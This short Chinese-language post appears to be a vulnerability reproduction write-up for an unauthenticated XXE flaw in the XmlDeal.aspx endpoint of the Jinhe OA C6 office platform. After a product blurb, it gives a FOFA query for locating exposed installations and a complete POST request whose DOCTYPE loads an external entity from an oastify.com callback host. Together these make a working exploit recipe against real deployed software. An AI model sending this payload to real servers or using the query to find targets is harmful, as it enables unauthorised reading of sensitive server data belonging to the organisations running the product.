0x01 产品简介
金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
0x02 漏洞概述
金和OA-C6-XmlDeal.aspx接口存在XML实体注入漏洞,未授权的攻击者可通过该漏洞获取服务器敏感数据。
0x03 测绘语句
fofa: app="金和网络-金和OA"
0x04 漏洞复现
使用burp自带的dnslog
POST /c6/JHSoft.Web.Message/XmlDeal.aspx HTTP/1.1
Host:
Content-Type: application/Xml
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://zdgenbqwmvts71ozygb7fowluc03otci.oastify.com/"> %remote;]>'